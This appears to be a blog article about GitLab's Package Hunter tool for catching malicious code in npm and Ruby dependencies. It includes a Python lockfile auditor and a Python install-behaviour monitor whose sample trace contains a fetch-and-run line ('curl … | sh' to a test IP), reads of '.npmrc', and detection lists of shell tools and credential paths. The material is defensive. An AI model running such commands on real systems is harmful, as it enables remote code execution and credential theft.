aum
    GitLab’s New Open Source Tool Will Detect Malicious Code

     

Security researchers already have a number of open-source tools at their disposal. GitLab has now added another one to that arsenal: a tool that detects malicious code in third-party dependencies.

The tool is called “Package Hunter”, and it is a useful addition for any project that pulls in third-party packages, which today is almost every type of software.

     

    What is Package Hunter?

     

Almost every piece of software builds on dependencies, which is what lets a developer assemble an application quickly.

While this reuse saves effort, developers usually just “trust” the dependencies they pull in without reviewing them separately.

Package Hunter addresses this gap: it lets you detect malicious code in a dependency package with little effort on your side.

     

Enhancing Software Supply Chain Security

     

Many supply chain attacks involve a compromised dependency package.

Typically, the attacker either injects malicious code into a dependency that is already publicly available, or publishes a look-alike package from a repository they control so that it passes for a legitimate one.

Even if you fetch packages through a package manager from a registry you trust, the package manager can be tricked into resolving a package name from a different registry than the one you expect (dependency confusion is the classic case), and the install completes without any warning.
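One cheap way to notice that kind of substitution after the fact is to audit the lockfile: every entry records where the tarball was resolved from and its integrity hash, so a private-scoped package that resolved from the public registry, or an entry with no integrity hash, stands out. The script below is an added example and is not part of Package Hunter; the `@acme/` scope, the internal registry host `npm.internal.example.com` and the `package-lock.json` content are all constructed for illustration.

```python
"""Offline audit of an npm package-lock.json (lockfileVersion 2/3 layout).

Added example, not Package Hunter code. The registry policy and the
lockfile below are constructed; point audit_lockfile() at a real lockfile
by loading it with json.load().
"""
import json
from urllib.parse import urlparse

# Constructed policy (assumption): packages under the @acme/ scope must come
# from the internal registry, everything else from registry.npmjs.org.
REGISTRY_POLICY = {
    "@acme/": "npm.internal.example.com",
    "": "registry.npmjs.org",
}

# Constructed lockfile with three cases: a clean public package, an internal
# package that silently resolved from the public registry, and a package
# recorded without an integrity hash. Hash values are placeholders.
SAMPLE_LOCK = json.loads(r'''
{
  "name": "demo-app",
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app",
         "dependencies": {"lodash": "^4.17.21", "@acme/auth": "^2.0.0", "left-pad": "^1.3.0"}},
    "node_modules/lodash": {
      "version": "4.17.21",
      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
      "integrity": "sha512-placeholder-constructed"
    },
    "node_modules/@acme/auth": {
      "version": "2.0.0",
      "resolved": "https://registry.npmjs.org/@acme/auth/-/auth-2.0.0.tgz",
      "integrity": "sha512-placeholder-constructed"
    },
    "node_modules/left-pad": {
      "version": "1.3.0",
      "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"
    }
  }
}
''')


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@acme/x' -> '@acme/x' (nested deps too)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def expected_host(name: str, policy: dict) -> str:
    """Longest matching scope prefix in the policy decides the registry host."""
    for prefix in sorted(policy, key=len, reverse=True):
        if name.startswith(prefix):
            return policy[prefix]
    return policy[""]


def audit_lockfile(lock: dict, policy: dict = REGISTRY_POLICY) -> list:
    """Return (package, problem) pairs for entries that violate the policy."""
    findings = []
    for lock_path, entry in lock.get("packages", {}).items():
        if lock_path == "" or entry.get("link"):
            continue  # root project entry or workspace symlink: nothing fetched
        name = package_name(lock_path)
        resolved = entry.get("resolved")
        if not resolved:
            findings.append((name, "no resolved URL"))
            continue
        host = urlparse(resolved).hostname or ""
        want = expected_host(name, policy)
        if host != want:
            findings.append((name, f"resolved from {host}, expected {want}"))
        if not entry.get("integrity"):
            findings.append((name, "no integrity hash"))
    return findings


if __name__ == "__main__":
    for name, problem in audit_lockfile(SAMPLE_LOCK):
        print(f"{name}: {problem}")
```

On the constructed lockfile this reports `@acme/auth` as resolved from the public registry instead of the internal one, and `left-pad` as lacking an integrity hash; `lodash` passes. Run it against a real lockfile in CI and fail the job on any finding.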

     

So an additional check on the supply chain that is as convenient to run as Package Hunter should improve software supply chain security.

And as open-source supply chain security improves, the security of open-source software overall gets a boost as well.

     

    How Does it Work? How Can You Get it?


Package Hunter does not just look at the code of a dependency; it also keeps an eye on how the dependency behaves.

It installs the dependencies in a sandbox environment and monitors that installation for anomalies (it uses Falco for this), so unexpected network connections, file access or process execution during an install step get flagged.
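To make the idea of behavioural monitoring concrete, here is a miniature rule engine run over a constructed trace of install-time events. This is an added example and not Package Hunter's code or its Falco rule set; the event format, the sandbox path `/sandbox/pkg` and the trace itself are assumptions made for the illustration. A real sandbox would feed syscall events from Falco or strace into something like this.

```python
"""Install-time behaviour monitor in miniature.

Added example: not Package Hunter's code. The event format and the trace
are constructed; each event is one syscall observed while a package's
install scripts run inside the sandbox.
"""
from os.path import basename

INSTALL_DIR = "/sandbox/pkg"              # assumed sandbox checkout (constructed)
ALLOWED_HOSTS = {"registry.npmjs.org"}    # only the registry may be contacted
SENSITIVE_MARKERS = ("/.ssh/", "/.npmrc", "/.netrc", "/.aws/", "/etc/shadow", "/.env")
SUSPICIOUS_BINARIES = {"sh", "bash", "curl", "wget", "nc", "python", "python3"}

# Constructed trace: two benign events followed by four that an install
# step has no business performing.
SAMPLE_TRACE = [
    {"proc": "npm", "syscall": "connect", "host": "registry.npmjs.org", "port": 443},
    {"proc": "node", "syscall": "openat", "flags": "O_RDONLY",
     "path": "/sandbox/pkg/node_modules/evil-pkg/index.js"},
    {"proc": "node", "syscall": "openat", "flags": "O_RDONLY", "path": "/root/.npmrc"},
    {"proc": "node", "syscall": "execve", "path": "/bin/sh",
     "args": ["-c", "curl -s http://203.0.113.9/x | sh"]},
    {"proc": "curl", "syscall": "connect", "host": "203.0.113.9", "port": 80},
    {"proc": "node", "syscall": "openat", "flags": "O_WRONLY|O_APPEND", "path": "/root/.bashrc"},
]


def rule_network(ev):
    """Any connection to a host other than the package registry."""
    if ev["syscall"] == "connect" and ev["host"] not in ALLOWED_HOSTS:
        return f"outbound connection to {ev['host']}:{ev['port']}"


def rule_credential_access(ev):
    """Opening credential or secret files, regardless of mode."""
    if ev["syscall"] == "openat" and any(m in ev["path"] for m in SENSITIVE_MARKERS):
        return f"access to credential file {ev['path']}"


def rule_write_outside(ev):
    """Writes anywhere except the sandbox checkout or /tmp."""
    if ev["syscall"] != "openat":
        return None
    writing = any(f in ev["flags"] for f in ("O_WRONLY", "O_RDWR", "O_CREAT"))
    inside = ev["path"].startswith(INSTALL_DIR + "/") or ev["path"].startswith("/tmp/")
    if writing and not inside:
        return f"write outside sandbox: {ev['path']}"


def rule_exec(ev):
    """Install scripts spawning shells or download tools."""
    if ev["syscall"] == "execve" and basename(ev["path"]) in SUSPICIOUS_BINARIES:
        return f"spawned {ev['path']} {' '.join(ev.get('args', []))}"


RULES = [
    ("network", rule_network),
    ("credential-access", rule_credential_access),
    ("write-outside-sandbox", rule_write_outside),
    ("suspicious-exec", rule_exec),
]


def scan_events(events):
    """Return (rule, process, detail) for every event that trips a rule."""
    alerts = []
    for ev in events:
        for name, rule in RULES:
            detail = rule(ev)
            if detail:
                alerts.append((name, ev["proc"], detail))
    return alerts


if __name__ == "__main__":
    for rule, proc, detail in scan_events(SAMPLE_TRACE):
        print(f"[{rule}] {proc}: {detail}")
```

The two benign events (npm talking to the registry, node reading a file inside the sandbox) produce nothing; the remaining four each trip exactly one rule. The point is that none of this requires understanding the obfuscated JavaScript in the package: a postinstall hook that reads `.npmrc` and shells out to `curl` is suspicious no matter how it is written.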

     

At the moment it supports testing Node.js modules (npm packages) and Ruby gems.

GitLab has been using the tool internally for a while, and it now integrates with GitLab as well, so it can run as part of a pipeline.

     

    You can learn more about setting it up by referring to the official documentation and the Package Hunter CLI instructions.

     

    It is available as a free and open-source project on GitLab.

     

    Source

